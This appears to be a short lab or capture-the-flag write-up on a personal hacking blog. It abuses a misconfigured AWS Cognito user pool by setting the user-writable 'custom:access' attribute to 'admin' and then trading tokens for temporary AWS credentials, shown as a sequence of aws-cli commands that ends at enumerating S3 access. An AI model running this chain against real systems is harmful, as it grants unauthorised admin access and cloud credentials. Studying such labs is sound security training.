rootđź’€senseicat:~#
Hack. Eat. Sleep. Repeat!!!
Project maintained by SENSEiXENUS Hosted on GitHub Pages — Theme by mattgraham
Vulnerable Cognito
- Create an account with an original mail
- Note the following stuffs for client-id and others for aws-cli
Userpoolid client-id
- Confirming verification-code-:
aws cognito-idp confirm-sign-up \ ─╯
--client-id <client-id> \
--username <*@gmail.com> \
--confirmation-code <code> --region us-east-1 | jq
- In the index.html’s code, you’ll notice an attributes
custom:accesswhich will grant special permissions if the value isadmin-:
var access = result[4].getValue() // currently the 'custom:access' is at index 4
// or if the index changes again,
// the following code always gets it
// for (const name of result) {
// if (name.Name === "custom:access") {
// access = name.Value;
// }
// }
console.log(access)
if(access == 'admin'){
window.location = "./admin.html";
}
- Updating attributes with aws-cli-:
aws cognito-idp update-user-attributes --access-token "<access-token>" --user-attributes Name="custom:access",Value="admin" --region us-east-1 | jq
- The new updated creds redirects us to
admin.htmlafter login which grants us identity pool credentials which we can exchange to aws short term credentials. Note the following in the picture.
Identitypool id for creating issuer Identity token
- Exchanging the items above for an identity id-:
aws cognito-identity get-id \
--identity-pool-id "[identitypoolid]" \
--logins="cognito-idp.[region].amazonaws.com/[userpoolid]=[token]" \
--region us-east-1 | jq
- Short lived credentials exchange-:
aws cognito-identity get-credentials-for-identity \
--identity-id "[identityid]" \
--logins="cognito-idp.us-east-1.amazonaws.com/[user_pool_id]=[identity_token]" \
--region us-east-1 | jq
- Running enumerate-iam shows we have access to s3 buckets-: